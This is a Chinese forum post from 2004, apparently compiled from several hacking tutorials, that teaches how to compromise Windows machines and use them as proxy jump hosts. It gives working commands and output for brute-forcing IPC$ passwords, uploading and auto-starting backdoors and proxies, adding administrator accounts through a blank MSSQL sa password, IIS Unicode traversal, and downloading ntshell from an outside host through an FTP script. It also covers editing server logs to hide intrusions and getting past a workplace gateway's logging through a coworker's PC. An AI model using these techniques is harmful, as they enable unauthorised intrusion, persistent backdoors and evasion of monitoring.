Board logo

标题: [推荐]菜鸟用代理 [打印本页]

作者: Jesse    时间: 2004-8-26 08:26     标题: [推荐]菜鸟用代理

一.菜鸟也可以拥有属于自己的代理服务器 首先,以下需要用到的软件: 1。NTSHELL 简介: ncx的确是个使用方便的好工具,不过功能太单一了,这个程序除了实现ncx的功能外,最主要的增强在于方便文件的传输:支持安装窃取登录密码的木马、客户与服务器直接交换文件,和从WEB上下载文件;此外还有进程管理、添加自动启动等功能。而且这些功能在有多个NTShell的客户和服务端时,可以在任意两个之间使用。 使用平台 服务端:Win NT、Win2000 功能: 安装窃取登录密码的木马、上传文件、下载文件、从WEB上下载文件、进程管理、添加自动启动的几大功能。还有口令控制、自设任意监听端口、自设连接超时值、重叠端口(可以重叠一般的服务端口,有时可以绕过防火墙)等。 用法详见软件说明(软件中附有例子) 本次使用的目的: 利用UNICODE漏洞控制目标机器,上传代理软件等。 2。SkSockServer(以下简称SSS) 简介: snake的代理跳板,支持TCP/UDP代理. !!!!! 支持多个(最多达到255)跳板.!!!普通的Sock代理程序之间的数据传输是不加密的,而SSS支持的跳板之间传输的数据是经过动态加密的,也就是说每次传输过程中,数据加密的方式都不相同。就算你不幸在hacking的过程中被webmaster发现,普通的sock代理程序将会被webmaster用sniffer把你的信息一览无遗,而恰巧你用的是SSS的话,呵呵~亲爱的webmaster将会看到一堆乱码!(呵呵~这是我最喜欢的一点了,安全第一;安全第一呀~) 使用平台: Windows NT/2000 功能: * 从本地机器连接到远程机器, 中间通过 安装的代理跳板。对应用程序而言,相当于普通的sock代理调用. * 在跳板之间传输的数据,是已经被动态加密的。加密种子每次不同。 * 跳板的数目由 1 到 255,不限制,当数目为0时,相当于Sock5代理服务器. 用法详见软件说明 3。NEC e-Border Client 简介: NEC e-Border Client 与 SocksCap32 一样是由 NEC USA, Inc. 开发的。它是被 NEC 称为“完整的 Socks 解决方案”的 e-Border 系统的客户端部分。它不仅能连接到专用的 e-Border 服务器,而且能够连接到普通 Socks5 代理服务器,提供强大的 Socks5 代理调度。除了能像 SocksCap32 那样对于特定的程序提供 Socks5 代理,也能截取你系统里的所有连接请求,将它们通过代理连接出去。更能设置多个 Socks5 代理服务器,提供更快更稳定的连接。所以,它除了能像 SocksCap32 那样为普通网络应用程序提供代理,更能代理诸如 DiabloII、星际争霸的战网连接和石器时代、万王之王此类网络游戏的服务器登录。如果你使用的是局域网或是 169 而想玩在线游戏,SocksCap32 无能为力时,可以用它试试,您一定会有一个惊喜的。 本次使用目的: 这觉得它是目前最好的代理服务器软件,可以接管所有TCP/IP协议! 软件虽大,但功能可非常强大,已有汉化破解补丁! 4。其它辅助工具,如“IP HACKER”等。 二.疯狂搜索代理服务器 大家都知道可以用代理猎手这个软件在网上搜索可用的代理服务器,可是要确定搜索的IP地址范围总是一件有点麻烦的事情。笔者在浏览一些个人网站的访问统计记录表时,发现那些统计记录都记录了访客的IP地址,而这些访客中一定是有许多人采用了代理服务器,那么何不直接从这些IP地址中找出其中的代理服务器呢?说干就干! 第一步:首先找个访问量较大的网站,再找到它的网易IP统计记录连接URL。 如以下这个统计链接:http://best.netease.com/cgi-bin/view/viewbasic.cgi?qydzc 拖动鼠标左键选取其IP统计记录,再点击右键选择复制 第二步:打开你的网页编写软件如Frontpage 2000(用Word也可以),选择“新建”,在新建网页的空白处点击鼠标右键选择粘贴,就会复制出刚才的IP统计记录表格 第三步:选取我们最需要的IP栏后点击按鼠标右键再选合并单元格。 第四步:当你完成第三步后其结果如下,这时我们再次选定合并后的IP记录栏,点鼠标右键选取复制。 最后就可以打开记事本程序,粘贴IP统计记录后保存为其结果。接下来就是在每个IP记录后假设性地加入80或者8080端口。 接下来只要用代理猎手软件来导入这些IP地址校验一下,这样就可以把这些网友所使用的代理服务器地址搜索出来了,怎么样?方法够绝的吧。 代理猎手下载地址:http://202.104.205.78/software/download.asp?fid=23553 网易易数统计排名:http://best.netease.com/cgi-bin/rate/rate.cgi 三.完全跳板安装手册 有不少朋友也常常问我究竟要如何安装跳板呢?用unicode漏洞安装的跳板权限太低了,现在又流行病毒,有unicode漏洞的肉鸡也是越来越不好找了,所以我把我安装跳板的过程写出来供大家分享,也希望大家都能学会这个方法,这样大家就不用老缠着别人等着公布跳板了,也不用等急了还要骂人!!   首先的准备工作有,检查你的机器是否为2000/NT/XP,否则你不能用这个方法完全安装跳板!如果你还在用98/ME,赶快升级吧!2.检查你下载的跳板压缩包里是否有SkSockServer.exe,没有可以到 http://person.longcity.net/home2/tezhongb/hex.zip下载!   呵呵!有了上面的东东,就开工吧!打开流光四!Ctri-A,在地址栏里填上你从IP地址表里找到的IP端,一般是选国外的,最好是台湾和日本的,略表一下爱国心嘛!在底下的选项里就保留IPC一个就够了,其它的全部去掉,呵呵,就这个漏洞好用!然后在点击上面〔设置〕边上的[IPC]选项,选中[仅对Administrator组进行猜解],呵呵!怎么样,没出10分钟,我就找到了十多个密码简单的肉鸡!本文假设你已经获得了111.111.111.111这台win2000服务器的管理员帐号,用户名为 test ,密码为 hello !提示:以下操作必须在winnt或win2000下面执行!并且要已经连到因特网,从 //开始是不用输入的,只是表示注释!本文假设你将srv.exe和asd.exe文件copy到c:\的根目录下面。   在开始的运行菜单键入 cmd ,进入了命令控制符界面。 ping 111.111.111.111 //查看网络是否畅通,只有出现类似于 Reply from 202.96.128.68: bytes=32 time=189ms TTL=242的回答表示网络畅通,可以执行下一步。 net use \\111.111.111.111\ipc$ "hello" /user:"test" //如果成功会出现命令成功完成的提示,不成功则stop,检查你的密码和用户名是否正确。 copy c:\asd.exe \\111.111.111.111\admin$\system32\ //将跳板文件上传到远程主机,大概一两分钟就可以了。 copy c:\srv.exe \\111.111.111.111\admin$\system32\ //将文件上传到远程主机,这个东东是用来打开肉鸡99端口的!在你的流光的目录底下的tools文件夹里能找到它!   然后点击流光上你找到的肉鸡,连接,呵呵,进入到NTCMD的界面,直接键入srv.exe,连接成功后返回到cmd底下,键入telnet 111.111.111.111 99   呵呵,看到什么? Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp. C:\WINNT\system32> C:\WINNT\system32>asd -install Snake SockProxy Service installed.       (安装跳板) C:\WINNT\system32> C:\WINNT\system32>asd -config starttype 2 The New StartType have set to 2 -- Auto   (使跳板自动运行,不怕肉鸡在重启了) C:\WINNT\system32> C:\WINNT\system32>asd -config port 5262 (让跳板工作在5262端口,你可以自己设定) The Port value have set to 5262 C:\WINNT\system32> C:\WINNT\system32>net start skserver The Snake SockProxy Service service is starting. The Snake SockProxy Service service was started successfully. (跳板安装成功) C:\WINNT\system32> C:\WINNT\system32>   我们现在来验证跳板是否真正运行。运行代理猎手,添加结果,将上面那台主机的 IP 加上去,端口是 5262 (就是我爱菱儿啦!),协议是 socks5 。验证它的结果是 free 。OK!一个完全安装的跳板就做成了! 四.怎样做跳板!(sql和ipc$的配合攻击) 今天给大家介绍一下通过sql和ipc$配合攻击远程主机并把它作为我们的跳板。   使用的工具:流光for nt/2000,操作平台:Windows nt/2000   首先用"流光"搜索sql类型主机,我选的ip段是211.23.*.*,大约过了一两分钟,就有3台机子被扫到,其中有两台是nt4.0,一台是win2000(用户名:sa,密码:空),我选了win2000那台作为跳板,首先用sqlrcmd与远程主机连接(工具-->sql远程命令,添上ip,用户名和密码,按确定,差不多过几秒钟就会看见SQL Remote Cmd For Fluxay 2001 by Assassin 1995 - 2000. Thanks to Eyas! Connect to 211.23.*.* MSSQL Server Success, Type Command in Prompt. SQLCmd> 这句话,如果没有看见的话,说明远程主机不支持sql远程登陆,我们这里只讨论可以远程登陆),然后用net use administrator命令看看管理员在不在(没在,不知到那去了,呵呵),下面我们要添加一个用户,net user love 1234 /add(如果显示命令成功,或者该用户已经存在,都说明你已经成功的添加了一个用户名为love,密码为1234的用户),然后我们要自己做administrator了,net localgroup administrators love /add(如果显示命令成功完成,或者该用户已经是该组成员,那么你就是administrator了)下面我们打开cmd.exe,输入net use \\211.23.*.*\ipc$ "1234" /user:"love"命令,如果显示命令成功完成,那么你就有90%的希望把它作为我们的跳板,首先上传一些文件(srv.exe,NTLM.exe),copy \hacktools\srv.exe \\211.23.*.*\admin$\system32(srv.exe是一个telnet的程序,端口是99,admin$是默认的共享,之所以上传到那里,是因为那里的文件比较多,不易被发觉,NTLM.exe也要上传),复制完了之后,我们就要启动srv.exe这个程序了,(我们利用的是对方主机的Schedule<定时服务>首先用net time \\211.23.*.*,看看对方主机的时间,(回显\\211.23.*.* 的本地时间是上午09:23),然后我们用at \\211.23.*.* 09:25 srv.exe命令来启动srv.exe(这里要注意一下时间的换算,24小时制),回显:新添加了一项作业 ,其作业 ID=?,这样我们只要等几分钟就可以telnet到主机了,过了几分钟……,我们用命令telnet 211.23.*.* 99 来登陆主机,(如果成功会有欢迎信息)然后我们要启动NTLM.exe了(用于修改Windows 2000 Telnet Servery身份验证的方式)在telnet状态下直接输入ntlm,回车,(成功之后回显:windows 2000 telnet dump,by assassin,all rights reserved.done!)最后一步:从新启动对方主机的telnet服务(不用退出telnet状态,直接输入net stop telnet,<停止telnet服务>,net start telnet,<启动telnet服务)(会有回显,由于各个win2000的版本不同,启动成功之后的的回显也不一样,这里不做介绍,)我们退出telnet的状态(命令:exit)然后在命令行下输入telnet 211.23.*.*,依照提示,接着输入用户名love,密码,1234,回车,(如果成功会有欢迎信息),就这样,我们的跳板就做好了,你可以用它登陆倒任何开启telnet服务的主机,比如接着输入telnet 211.73.134.91(呵呵,可以登陆),作一个跳板是不是很简单呢? 跳板可以在特殊的情况下隐藏你的ip,比如刚才登陆到211.73.134.91所留的ip,就是211.23.*.*的ip 。 五.利用跳板的一次实战 问:在我们公司的局域网中,有一部分IP地址是可以访问INTERNET的。 请问:用什么软件可以扫出可以能访问互联网的IP地址? 如有人点,小弟不胜感激! 答: 我只有一种方法! 知道他们的用户名直接去ping 得出他们的ip后用流光扫描他们的ip取得他们的admin的权限后,在它的机器上面作一个跳板,就可以了,随后用sockscaps进行透明代理就可以了! 怀疑代理软件将这些ip已经进行直接绑定,如果他们的机器关了,你就可以在网络设置里面填上它的ip,应该就可以直接上网了! 实战: 我的实战: 我公司由代理出去的!用的是wingate代理软件并有网关设置全都有192.168.1.250出去! 每个人都有用户名和密码!代理软件很厉害,会把你去的网站,时间,IP地址和下载的东东纪录的一清二楚! 首先我想盗用别人的密码上去,但是不行,这样很麻烦,会记录下我机器的IP地址,为了防止他ping出我的机器的名字,我还得自己不断的该地址,很麻烦! 随后我想到了公司有几个人比较特殊,他们的ip是可以直接出去的!网关将对他们的地址直接绑定了,对!就从他们机子入手!首先知道他们的机器姓名,随后ping -a ******(机器姓名),得出ip,及ttl=128, 我确定了这是win2000的系统,好用流光扫描它的系统(Ipc),扫到了它的简单的administrator的口令,我开心极了,赶快net use....将snake的工具和流光的srv.exe copy了过去!嘻嘻!马上想在他那里开了个后门,(我喜欢8088的手机就用它作端口吧)具体做法和跳板一样: net use \\(机器ip)\ipc$ "" /user:"administrator" copy c:\sksockserver.exe \\(机器ip)\admin$\system32\ //文件上传 copy c:\srv.exe \\(机器ip)\admin$\system32\ //文件上传(在流光的tools目录下面) 回到流光的界面连接它随后:srv.exe 连接成功后到运行窗口,键入cmd 则成功进入了他的系统随后 c:\winnet\system32>sksockserver -install c:\winnet\system32>sksockserver -config starttype2(不怕他重新启动) c:\winnet\system32>sksockserver -config port 8088(我喜欢的端口) c:\winnet\system32>net start skserver (完成了) 但是问题来了,我设置好了,问题不能用!(我火了)辛辛苦苦才建立好的,我该怎么办呢? 首先我将他的ip地址和8088的端口添在IE的代理设置上面不行, 我得出结论首先一定要运用socks软件穿过去才行得通! 大家想到了吧!对!"SocksCap V2"透明的代理服务器!(鬼子写出来的,口碑很好) 我赶快将ip及端口添上,然后选择socks(5)的版本并由本地端解析所有的域名,ok!将IE加入"SocksCap V2"里面,由它来启动,只看见精美的网页出现在我的面前!乌拉!万岁!这样出去网关是不会纪录的!被黑的对象自己也不知道!嘻嘻!!!(这是运用了跳板后门和透明代理的一次实践,成功了!) 附录: 问:你是如何判断对方的操作系统是什么的?就拿你的实例来说你是怎么知道他用的是win2000; 答:我自己解释!去ping 他的机器得出 TTL=128的则是WIN2000 TTL=255的是LINUX或者是SUN的系统!(一般情况) 问:你是怎么用流光猜解他的IPC$帐号和密码的,就是具体的操作,是在帐号和密码上各挂一个字典跑吗?是不是一般人的IPC$帐号就是他的win2000的登录帐号呢? 答:流光挂个字典也可以!IPC$是ADMIN的一个通道,可以扫出他的账号!流光的操作你看老特的跳板完全手册吧! 六.谈谈怎样作后门、建跳板 前段时间做了一些肉鸡做跳板,辛辛苦苦上传了很多文件,但使用不到几天就被K了,漏洞也补上了,后来干脆不用跳板了!结果警告来了!痛定思痛!如何在肉鸡上留下后门达到长期使用的目的呢?今天早上在网上找了一早,也没有找出什么有用的东西!还是自己动手吧!我门通常使用nc,ncx,netcat等东西来开后门,但这些后门只是临时的,,主要用于得到Admin权限,能不能留下长期的后门呢?能! 我在这里介绍的只是如何制作后门,不打算介绍如何得到Admin权限!至于如何得到Admin,方法很多!U,SQL,溢出、ipc管道、暴力…………单有一点是肯定的,要留后门,必须有Admin权限。 我打算介绍用两种方法,确切的说是用两个软件! 第一:用小榕的remotenc。第二,用NT Shell 1.0 Beta,这两个软件的共同点是都能作为服务运行在远端服务器上!我使用下来感觉差不多!不过ntshell的功能远不止开后门,呵呵!很强大的工具!可以得到asp文件!这对想破江湖的人可是………… 再强调一点,one:太容易进入的主机不要作自己的跳板(除非你进去后留下后门把漏洞给补上)two:速度太慢和小型http服务器不要作自己的跳板。three:进入得到Admin权限后接下来要作的事:留后门--》做代理(就是snake的那个)--》补漏洞 以上三点属个人意见,供参考! 好了,说了半天的废话,我们开始用小榕的remotenc做我们的第一个跳板! 假设我们已经得到192.168.0.1的admin权限,user:hack password:123,并且192.168.0.1支持ipc$远程连接!(呵呵!废话!不能连接怎么作跳板!)在自己c:\hack下有remotenc,好,开始 c:\hack\remotenc 192.168.0.1 hack 123 runasuser "RemoteNC" "Provide Local CMD Redirect" 7 91888 解释: remotenc 目标主机 用户名 密码 启动模式 "服务名称" "服务说明" 监听的端口 控制密码 /overwrite(注:可以不加该参数) 其中: 用户名必须是admin权限 启动模式有runasuser和localsystem两种(建议用runasuser模式,如果runasuser模式失败就用localsystem模式) 服务说明是启动后显示在服务管理器中的说明,为了迷惑管理员,建议不要用“hack”之类 监听的端口是remotenc作为服务启动以后开的监听端口,可以是7、8等,但不要是21、23、25、80等 控制密码:你telnet(或者ntshell)到监听端口后需要的密码,也就是你对remotenc的控制密码。(这里就不要要了哈!别这么小气三) /overwrite覆盖已经安装的remotenc(不要覆盖我的哈) 回车后出现如下信息: =======RemoteNC Beta 4, Written by Assassin 2001======= http://www.netXeyes.comhttp://www.netxeyes.org/ [Install Service as RunasUser Mode] Connecting 192.160.0.1 ..... Done. Transffer File ..... Done. Start Service ..... Done. Now You can Telnet 192.168.0.1 to Connect, Have a Joy 也可能出现: =======RemoteNC Beta 4, Written by Assassin 2001======= http://www.netXeyes.comhttp://www.netxeyes.org/ [Install Service as RunasUser Mode] Connecting 192.168.0.1 ..... Done. Transffer File ..... Done. Start Service ..... Service Exsited,1206Failed. 这是启动服务失败 这是可以把安装模式换为localsystem,即 c:\hack\remotenc 192.168.0.1 hack 123 localsystem "RemoteNC" "Provide Local CMD Redirect" 7 91888 就能安装成功! 如果出现第一中情况,祝贺你,然后 Microsoft Telnet> open 192.168.0.1 7 正在连接到192.168.0.1 7... 然后出现: RemoteNC Control Password:(这里输入你的控制密码91888) 然后出现: RemoteNC Control Password: ********* ===============Banyet Soft Labs. 1995-2001 All RightsReserved.=============== =========Written by Assassin, Server EditionFluxShadow@21cn.com============== Microsoft Windows 2000 [セ 5.00.2195] RemoteNC> 哈哈,可以添加用户了!net命令就不用说了哈(即使hack 123的账户被K了,仍然可以telnet到7在remotenc下添加用户,只要他不发现在服务管理器中的Provide Local CMD Redirect,你就一直都有自己的账户!)拷贝必要的文件上去!twwwscan等(注意隐蔽),或者fshttp,fspop也加上去,哈哈真的很爽!也可作成自己的sock5代理。 添加完用户,启动他的telnet服务如果没有启动的话),又可以继续运行你的twwwacan等东西了! 第二种方法,利用NT Shell 1.0 Beta 为了讲述ntshell的详细用法,我详细讲述 一、ntshell分为客户端和服务端!服务端的名称为ntshell.exe,客户端ntshellc.exe 二、ntshell的语法: 内建的命令都是以'?'开头,在命令行上输入'?help'可以查看命令帮助列表,命令不分大小写。共有以下几个命令,其中由于标准的telnet不支持文件传输,因此前两个命令就是文件互传,必须使用附带的客户端才能实现。同时虽然在文件传输时,你可以运行其他命令,但是同一时刻只能有一个文件在传输(也就是前一个get,put,httpget命令没完成,就不能再执行这3个命令中的任意一个),这主要是因为我为了编程方便,而且我觉得也没必要多个文件同时传输,不过如果有必要,以后可以考虑。 ?autorun [name file "args"] --- 将本程序添加到自动运行,将检查所有已知位 置(先是注册表);name是一个项名,file是程序名(当然也可以是其他 程序),args是程序的参数列表,一定要用""括起来。缺省是NTKernel ntshell.exe "-w 10"。 ?canceldata --- 终止刚才传输的文件 ?chdir --- 更改服务器的当前目录,不加参数查看当前目录,可以是网上邻居中的共享 ?get [port] --- 从服务器下载文件,可以指定使用服务器使用[port]端口传输 ?help --- 查看命令帮助列表 ?httpget --- 从 'host'主机上下载文件 'url', 必须以根'/'开始 例如httpgethttp://192.168.0.1/ / hackdir/hackprog.exe,可以没有http:// ?pskill PID --- 杀死指定PID的进程 ?pslist --- 列出当前系统中的所有进程,如果是guests组可能很多进程不能获得详细信息 ?put [port] --- 上传文件到服务器,可以指定使用服务器使用[port]端口传输 ?quit --- 服务器端退出,相当于使用exit命令,不过如果执行 了copy con abc这样的坏内部命令,你就不能在使用exit命令 了,可以使用quit退出 ?restart [ [pass]--- 以user身份重启动shell,不过本版本只能重起 shell,不能以指定的用户运行。原因是使用CreateProcessAsUser创建进 程时权限不足,即使原来是admin也不行 ?sysinfor --- 获得系统的信息,现在只有os的简短信息   程序支持的参数为(使用'?use'参数可以查看该列表,不使用‘/?’或‘-?’来实现是因为一旦把它留在服务器上,敌方运行该程序查看到程序功能的话,就糟了) ntshell [-listen Listenport] [-time Timeout] [-pass Password] [-show] [-wait WInterval] [-until time] [-last LInterval] -listen Listenport --- 指定监听的端口,缺省值是22 -time Timeout --- 指定超时的秒数,缺省值是180 -pass Password --- 指定连接的口令,如果含有空格,使用" "包含口 令; 缺省值是"let me in" -show ---显示一个console窗口,用户可以通过关闭该窗口结束本程序 -wait WInterval ---在程序运行后,先等待WInterval分钟,然后监听端口 -until hour:minu --- 在程序运行后,直到hour:minu时才监听端口 -last LInterval --- 在程序监听端口后,如果LInterval分钟内没有连接,将 结束程序 最后三项是为了增加程序的隐蔽性,以避免在通常情况下使用程序发现监听的进程 三、ntshellc的用法: 在没有连接的情况下,提示符是NTShellc>,此时可以使用以下的3个内建命令,命令均为小写。命令可以简写。 h[elp] ---- 显示支持的命令列表 o[pen] [port] ---- 与target的port进行连接,port缺省值是22 q[uit] ---- 退出本程序 程序支持的两个参数,可以使用标准的'/?'参数查看该列表。如果不提供参数将进入NTShellc>提示符,然后可以使用open命令进行连接。 ntshellc [Target] [Port] [Target] ---- 要连接的服务器 [Port] ---- 要连接的端口 四、实例 --NTShell使用示例 本示例仅为示范NTShell的功能与语法,因此使用unicode漏洞进行攻击试验。其中以'//'开头的行是我的注释,其他的是程序的输出。 //在本机运行客户端, F:\hacktool\ntshell>ntshellc NtShell Client Program. > Type Help to see the commands //连接目标计算机的www服务 NTShellc>o 192.168.0.1 80 > Connect to 192.168.0.1 at Port 80 ... > Connected with the server. //请求一个已知的文件 GET /iissamples/default%c1%1csamples.asp /HTTP/1.0 //找不到文件,IIS4.0,应该是%1%9c, HTTP/1.1 404 找不到对象 Server: Microsoft-IIS/4.0 Date: Sat, 10 Feb 2001 15:08:26 GMT //再来, NTShellc>o 192.168.0.1 80 > Connect to 192.168.0.1 at Port 80 ... > Connected with the server. GET /iissamples/default%c1%9csamples.asp HTTP/1.0 //行了,找到了, HTTP/1.1 200 OK //下面要试试,哪些web目录在和系统在同一个逻辑盘上 GET /scripts/..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir //找到了,就用它了 HTTP/1.1 200 OK Server: Microsoft-IIS/4.0 Directory of C:\Inetpub\scripts 01-01-09 02:58p . 01-01-09 02:58p .. 00-08-28 05:30p proxy 00-08-28 05:30p tools 4 File(s) 241,424 bytes 850,364,416 bytes free > Connection closed NTShellc>o 192.168.0.1 80 //拷贝cmd.exe GET /scripts/..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+copy+\winnt\system3 2\cmd.exe+dmc.exe //不理它, 1 file(s) copied. 没有访问拒绝就行 HTTP/1.1 502 网关错误 Server: Microsoft-IIS/4.0 Date: Wed, 07 Feb 2001 09:47:20 GMT Content-Length: 190 Content-Type: text/html CGI 运用程序中出错

CGI 错误

指定的 CGI 应用程序因为没有返回完整的 HTTP 标题而运行不正 常。它返回的标题是:

 1 file(s) copied. 
> Connection closed //下面就方便了,赶紧把ntshell上传, 就使用ftp脚本吧, GET /scripts/dmc.exe?/c+echo+open+192.168.0.45>ftp.bin GET /scripts/dmc.exe?/c+dir GET /scripts/dmc.exe?/c+echo+anonymous>>ftp.bin GET /scripts/dmc.exe?/c+echo+test@test>>ftp.bin GET /scripts/dmc.exe?/c+echo+binary>>ftp.bin--//一定要有这步,不然有的运行不正常 GET /scripts/dmc.exe?/c+echo+get+ntshell.exe>>ftp.bin GET /scripts/dmc.exe?/c+echo+quit>>ftp.bin //看看文件内容写的对不对, GET /scripts/dmc.exe?/c+type+ftp.bin HTTP/1.1 502 网关错误 Server: Microsoft-IIS/4.0 Date: Wed, 07 Feb 2001 14:57:14 GMT Content-Length: 232 Content-Type: text/html CGI 运用程序中出错

CGI 错误

指定的 CGI 应用程序因为没有返回完整的 HTTP 标题而运行不正 常。它返回的标题是:

open 192.168.0.45 
anonymous 
test@test 
get ntshell.exe 
quit 
> Connection closed //好的,执行ftp GET /scripts/dmc.exe?/c+ftp+-s:ftp.bin GET /scripts/dmc.exe?/c+dir Directory of C:\Inetpub\scripts 01-02-07 10:58p . 01-02-07 10:58p .. 98-11-11 04:04a 241,424 dmc.exe 01-02-08 12:24a 64 ftp.bin 01-02-08 12:25a 53,248 ntshell.exe 00-08-28 05:30p proxy 00-08-28 05:30p tools 7 File(s) 294,736 bytes 854,074,368 bytes free //执行ntshell, GET /scripts/ntshell.exe HTTP/1.0 //ctrl+c结束这个连接,退出程序。 //再次进入 F:\hacktool\ntshell>ntshellc NTShellc>o 192.168.0.1 > Connect to 192.168.0.1 at Port 22 ... > Connected with the server. let me in Use 'net helpmsg xxx' to see detail message of Error Code. Microsoft(R) Windows NT(TM) (C) Copyright 1985-1996 Microsoft Corp. //看看它的系统, C:\Inetpub\scripts>?sysinfor # Operation System is Windows NT 4.0, # Build Number:1381 # Service Pack 4 //nt4+sp4的,去看看log文件 C:\Inetpub\scripts>cd c:\winnt\system32\logfiles C:\WINNT\system32\LogFiles>cd w3svc1 cd w3svc1 拒绝访问。 //得,还没的看,以后再说吧; C:\WINNT\system32>cd ..\repair C:\WINNT\repair>dir 00-03-31 09:15p 3,544 sam._ //虽然有用的可能性很小,不过还是那回来试试吧, C:\WINNT\system32>?get \winnt\repair\sam._ > download file 'sam._' 3544 bytes complete success. //看看它都运行了什么程序, C:\WINNT\system32>?pslist # EnableDebugPrivileges Error, Code:1300 Process ID: 2 Query Process Detail infor Error Process ID: 25 Query Process Detail infor Error Process ID: 33 Query Process Detail infor Error ... Process ID: 565 Query Process Detail infor Error Process ID: 572 C:\Inetpub\scripts\ntshell.exe Process ID: 466 C:\WINNT\System32\cmd.exe # Total 42 processes in system. //喔赛,都看不了,还有个1300是什么错误?用net看看 C:\WINNT\system32>net helpmsg 1300 net helpmsg 1300 并非所有被引用的特权都分配给调用者。 //看来guest的权限实在太小了,好在知道ntshell和它的cmd进程id,不行了可以杀 C:\Inetpub\scripts>?help #?autorun [name file "args"] --- add the [file] to autorun when reboot, [file] default is ntshell.exe //可以自动运行,要试试, C:\Inetpub\scripts>time time 当前时间: 5:33:27.32 输入新时间: //它的时间和我的差不多,行了 C:\Inetpub\scripts>?autorun ntshelld ntshell.exe "-until 2:00 -pass "a b c" -last 60" # file 'C:\Inetpub\scripts\ntshell.exe' has added to autorun at C:\WINNT\Profiles\All Users\「开始」菜单\程序\启动\ntshelld.lnk //看来没在注册表中找到位置,到底在开始菜单中找到一个可以运行的地方,好了,等着系统重起动吧 //(一定注意参数作为一个字符串,使用" "括起来,不然可能就不对了。这个参数的意思是“程序//运行后,直到夜里2点开始监听连接,持续60分钟,连接后使用a b c作为口令”) C:\Inetpub\scripts>del ftp.bin C:\Inetpub\scripts>exit NTShellc>q //破解完了sam._,用里边的密码进行,net use无效,看来这个密码文件没什么用了, //过两天在夜里2点到3点之间进行连接,看看成功否 NTShellc>o 192.168.0.1 > Connect to 192.168.0.1 at Port 22 ... > Connected with the server. //连上了,ok a b c C:\>cd winnt\system32\logfiles C:\WINNT\system32\LogFiles>cd w3svc1 C:\WINNT\system32\LogFiles\W3SVC1>?get C:\WINNT\system32\LogFiles\W3SVC1\ex010205.log //把记录改改,再给他put回去 C:\WINNT\system32\LogFiles\W3SVC1>?put ex010205.log //好了,这台机器行了,在加个admin组的用户, //把ntshell的客户端拿过来,再看看其他机器, C:\WINNT\system32\LogFiles\W3SVC1>cd \inetpub\scripts C:\Inetpub\scripts>?put ntshellc.exe //运行它, C:\Inetpub\scripts>ntshellc NTShellc>o 192.168.0.45 80 > Connect to 192.168.0.45 at Port 80 ... > Connected with the server. GET / HTTP/1.0 HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Content-Location:http://192.168.0.45/index.html //嗯,是台win2k+iis5, 如发炮制。 NTShellc>NTShellc>q C:\Inetpub\scripts> //想办法上传ntshell,并运行它,然后运行ntshellc进行连接 C:\Inetpub\scripts>ntshellc NTShellc>NTShellc>o 192.168.0.45 > Connect to 192.168.0.45 at Port 22 ... > Connected with the server. D:\Inetpub\Scripts>cd \ cd \ //取看看log文件,是我连接的,还是192.168.0.1 D:\>cd winnt\system32\logfiles cd winnt\system32\logfiles D:\WINNT\system32\LogFiles> D:\WINNT\system32\LogFiles>cd w3svc1 D:\WINNT\system32\LogFiles>cd w3svc1 D:\WINNT\system32\LogFiles\W3SVC1>D:\WINNT\system32\LogFiles\W3SVC1>type ex010208.log D:\WINNT\system32\LogFiles\W3SVC1>type ex010208.log #Software: Microsoft Internet Information Services 5.0 #Version: 1.0 #Date: 2001-02-08 02:04:40 #Fields: time c-ip cs-method cs-uri-stem sc-status 10:11:34 192.168.0.1 GET /index.html 200 D:\WINNT\system32\LogFiles\W3SVC1>time time 当前时间: 10:18:42.97 输入新时间: D:\WINNT\system32\LogFiles\W3SVC1>exit exit > Connection closed NTShellc>NTShellc> //ok, telnet跳板基本还可以,就是有时输出重复,一般一个命令得回车两次 以上是作跳板留后门的两种方法!还有什么高招!请发表!交流! 七.在肉鸡上安装ftp服务器 本文涉及到的相关软件打包下载(展开后的文件说明): adminftp.exe slimftp服务器的设置端 slimftp2.exe slimftp服务器服务端 slimftp2.html slimftp服务器说明文件 reg.exe Windows XP的命令行下的注册表编辑器,支持win2000,NT 4.0 ftp.reg 如文章中一样设置创建的一个注册表文件   我们在入侵别人机器时候,经常需要一个ftp服务器。去申请的主页空间附带的ftp服务器常常有各种限制,而且,不小心就会暴露了自己的身份。因此,建立一个自己专用的ftp服务器,是很有用的。经过我一阵疯狂搜索,终于找到了slimftp这个好东东,首先,它身材小巧,而且不需要安装,在console下就可以运行,绝对不会弹出窗口,提供了标准的上传、下载功能,而且可以更改服务端口、设置用户权限等。关于slimftp的功能,请参考它的说明文档。   在这里,我假定大家已经获得了一个管理员或者系统权限的shell,这是安装它必需的权限。   安装步骤:分为本地设置和服务器设置。   本地设置:将本文附带的文件全部放在一个文件夹里面,这里是d:\ftp,然后运行adminftp.exe。运行窗口分成三部分,最上面是服务器的参数的设置,左下方是用户帐号的设置,右下方是访问目录的设置。   对于服务器参数的设置,只需要对server port(服务器端口)进行一下设置就可以了,因为服务器上通常还运行有ftp服务器,所以,我们改一个不一样的端口,这里我是设置了3323,另外两个参数就不用管了。然后,我们再添加一个用户,点一下new,输入一个用户名root,再选中这个用户,输入一个密码nopass 。最后,在localroot上输入一个路径c:\,这是作为root用户的根目录的,点一下new,在弹出的窗口上输入 / 就可以了,再将下面的四个权限全部钩上吧。read权限允许用户下载文件,write权限允许用户上传文件,list权限允许用户看目录列表,admin权限允许用户重命令和删除ftp服务器上的文件。如果需要,还可以创建多个用户,这就要看你了。   进入命令行,切换目录到d:\ftp,输入 :reg export "HKLM\SOFTWARE\WhitSoft Development" ftp.reg   现在本地操作已经全部完成了。   远程操作:将ftp.reg、slimftp2.exe、reg.exe都上传到肉鸡上,然后将slimftp2.exe拷贝到肉鸡的系统目录(通常为c:\winnt\system32,假如不存在)上。再运行:   reg import ftp://ftp.reg/   reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Winsock2up /d slimftp2.exe   copy slimftp2.exe %systemroot%\system32   slimftp2.exe   运行copy slimftp2.exe %systemroot%\system32这步的时候有时会提示出错,这是因为slimftp2.exe已经是在系统目录上了。最后,删除ftp.reg吧!。   呵呵,一切都完成了,即使肉鸡重启我们的ftp服务器也会照样运行的。   不过,这个服务器的端口有点特别,我们怎么访问呢?   假如是用ie,这样输入就好了 ftp://root:nopass@192.168.0.1:3323/ 将192.168.0.1替换成你服务器的ip就可以了。dos下的ftp呢?这样!   ftp   open 192.168.0.1 3323   